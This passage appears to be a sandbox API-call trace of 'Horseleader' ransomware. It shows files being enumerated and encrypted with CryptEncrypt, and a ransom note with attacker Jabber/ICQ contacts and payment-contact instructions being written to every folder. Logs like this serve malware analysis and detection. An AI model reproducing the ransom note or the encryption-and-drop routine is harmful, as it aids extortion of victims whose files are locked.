Shared\\ink\\fsdefinitions\\main\\#Decrypt#.txt") returned 87 [0233.157] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0233.159] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new 
account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0233.159] WriteFile (in: hFile=0x1a4, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32ae920, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32ae920*=0x5e4, lpOverlapped=0x0) returned 1 [0233.161] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0233.161] WriteFile (in: hFile=0x1a4, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32ae920, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32ae920*=0x558, lpOverlapped=0x0) returned 1 [0233.161] CloseHandle (hObject=0x1a4) returned 1 [0233.161] 
GetProcessHeap () returned 0x780000 [0233.161] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dd078 | out: hHeap=0x780000) returned 1 [0233.161] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8f513079, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x8f513079, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x8f513079, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x9655, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="main.xml", cAlternateFileName="")) returned 1 [0233.161] lstrcmpiW (lpString1="main.xml", lpString2="Windows") returned -1 [0233.161] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main.xml") returned 77 [0233.162] StrStrIW (lpFirst="main.xml", lpSrch=".horseleader") returned 0x0 [0233.162] lstrcmpW (lpString1="main.xml", lpString2="#Decrypt#.txt") returned 1 [0233.162] lstrcmpW (lpString1="main.xml", lpString2="_uninstalling_.png") returned 1 [0233.162] lstrlenW (lpString=".testttjffg") returned 11 [0233.162] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main.xml", lpSrch=".testttjffg") returned 0x0 [0233.162] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0233.162] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0233.162] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, 
lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0233.162] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7a0866, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7a0866, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7a0866, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="numbers", cAlternateFileName="")) returned 1 [0233.162] lstrcmpiW (lpString1="numbers", lpString2="Windows") returned -1 [0233.162] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers") returned 76 [0233.163] lstrcmpW (lpString1="numbers", lpString2=".") returned 1 [0233.163] lstrcmpW (lpString1="numbers", lpString2="..") returned 1 [0233.163] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0233.163] GetProcessHeap () returned 0x780000 [0233.163] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dd078 [0233.163] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers\\*") returned 78 [0233.163] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers\\*", lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7a0866, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7a0866, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7a0866, 
ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x152ba5ec, dwReserved1=0x29b53f4d, cFileName=".", cAlternateFileName="")) returned 0x7c68a0 [0233.164] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0233.164] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers\\.") returned 78 [0233.164] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0233.164] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7a0866, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7a0866, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7a0866, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x152ba5ec, dwReserved1=0x29b53f4d, cFileName="..", cAlternateFileName="")) returned 1 [0233.164] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0233.164] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers\\..") returned 79 [0233.164] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0233.164] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0233.164] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8f7e6a73, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x8f7e6a73, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x8f7e6a73, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x4c2, dwReserved0=0x152ba5ec, dwReserved1=0x29b53f4d, cFileName="numbase.xml", cAlternateFileName="")) returned 1 [0233.164] lstrcmpiW (lpString1="numbase.xml", 
lpString2="Windows") returned -1 [0233.164] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers\\numbase.xml") returned 88 [0233.164] StrStrIW (lpFirst="numbase.xml", lpSrch=".horseleader") returned 0x0 [0233.164] lstrcmpW (lpString1="numbase.xml", lpString2="#Decrypt#.txt") returned 1 [0233.164] lstrcmpW (lpString1="numbase.xml", lpString2="_uninstalling_.png") returned 1 [0233.165] lstrlenW (lpString=".testttjffg") returned 11 [0233.165] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers\\numbase.xml", lpSrch=".testttjffg") returned 0x0 [0233.165] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0233.165] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0233.165] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers\\numbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\numbers\\numbase.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0233.165] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8f7e6a73, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x8f7e6a73, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x8f7e6a73, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x4c2, dwReserved0=0x152ba5ec, dwReserved1=0x29b53f4d, cFileName="numbase.xml", cAlternateFileName="")) returned 0 [0233.165] FindClose (in: 
hFindFile=0x7c68a0 | out: hFindFile=0x7c68a0) returned 1 [0233.165] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers\\#Decrypt#.txt") returned 90 [0233.165] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\numbers\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0233.166] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. 
\r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0233.166] WriteFile (in: hFile=0x1a4, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32ae920, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32ae920*=0x5e4, lpOverlapped=0x0) returned 1 [0233.171] lstrlenA (lpString="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") returned 1368 [0233.171] WriteFile (in: hFile=0x1a4, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32ae920, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32ae920*=0x558, lpOverlapped=0x0) returned 1 [0233.171] CloseHandle (hObject=0x1a4) returned 1 [0233.171] GetProcessHeap () returned 0x780000 [0233.171] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dd078 | out: hHeap=0x780000) returned 1 [0233.171] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8f79a7b7, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x8f79a7b7, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x8f7c0915, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0xd1, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="numbers.xml", cAlternateFileName="")) returned 1 [0233.171] lstrcmpiW (lpString1="numbers.xml", lpString2="Windows") returned -1 [0233.171] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers.xml") returned 80 [0233.171] StrStrIW (lpFirst="numbers.xml", lpSrch=".horseleader") returned 0x0 [0233.172] lstrcmpW (lpString1="numbers.xml", 
lpString2="#Decrypt#.txt") returned 1 [0233.172] lstrcmpW (lpString1="numbers.xml", lpString2="_uninstalling_.png") returned 1 [0233.172] lstrlenW (lpString=".testttjffg") returned 11 [0233.172] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers.xml", lpSrch=".testttjffg") returned 0x0 [0233.172] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0233.172] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0233.172] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\numbers.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0233.187] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7a0866, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7a0866, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7a0866, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="oskmenu", cAlternateFileName="")) returned 1 [0233.187] lstrcmpiW (lpString1="oskmenu", lpString2="Windows") returned -1 [0233.187] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu") returned 76 [0233.187] lstrcmpW (lpString1="oskmenu", lpString2=".") returned 1 [0233.199] lstrcmpW (lpString1="oskmenu", lpString2="..") returned 1 [0233.199] lstrcmpW 
(lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0233.200] GetProcessHeap () returned 0x780000 [0233.200] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dd078 [0233.200] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\*") returned 78 [0233.200] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\*", lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7a0866, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7a0866, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7a0866, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x152ba5ec, dwReserved1=0x29b53f4d, cFileName=".", cAlternateFileName="")) returned 0x7c68a0 [0233.207] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0233.207] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\.") returned 78 [0233.207] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0233.207] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7a0866, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7a0866, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7a0866, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x152ba5ec, dwReserved1=0x29b53f4d, cFileName="..", cAlternateFileName="")) returned 1 [0233.207] lstrcmpiW (lpString1="..", 
lpString2="Windows") returned -1 [0233.207] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\..") returned 79 [0233.207] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0233.207] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0233.207] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8f832d2f, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x8f832d2f, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x8f858e8d, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x1d7, dwReserved0=0x152ba5ec, dwReserved1=0x29b53f4d, cFileName="oskmenubase.xml", cAlternateFileName="")) returned 1 [0233.207] lstrcmpiW (lpString1="oskmenubase.xml", lpString2="Windows") returned -1 [0233.208] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml") returned 92 [0233.208] StrStrIW (lpFirst="oskmenubase.xml", lpSrch=".horseleader") returned 0x0 [0233.208] lstrcmpW (lpString1="oskmenubase.xml", lpString2="#Decrypt#.txt") returned 1 [0233.208] lstrcmpW (lpString1="oskmenubase.xml", lpString2="_uninstalling_.png") returned 1 [0233.208] lstrlenW (lpString=".testttjffg") returned 11 [0233.208] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml", lpSrch=".testttjffg") returned 0x0 [0233.208] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0233.208] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 
[0233.208] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0233.251] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8f832d2f, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x8f832d2f, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x8f858e8d, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x1d7, dwReserved0=0x152ba5ec, dwReserved1=0x29b53f4d, cFileName="oskmenubase.xml", cAlternateFileName="")) returned 0 [0233.252] FindClose (in: hFindFile=0x7c68a0 | out: hFindFile=0x7c68a0) returned 1 [0233.252] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\#Decrypt#.txt") returned 90 [0233.252] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskmenu\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0233.252] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a 
new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0233.252] WriteFile (in: hFile=0x1a4, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32ae920, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32ae920*=0x5e4, lpOverlapped=0x0) returned 1 [0233.253] lstrlenA (lpString="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") returned 1368 [0233.253] WriteFile (in: hFile=0x1a4, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32ae920, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32ae920*=0x558, lpOverlapped=0x0) returned 1 [0233.254] CloseHandle (hObject=0x1a4) returned 1 [0233.254] GetProcessHeap () returned 0x780000 [0233.254] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dd078 | out: hHeap=0x780000) returned 1 [0233.254] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8f80cbd1, 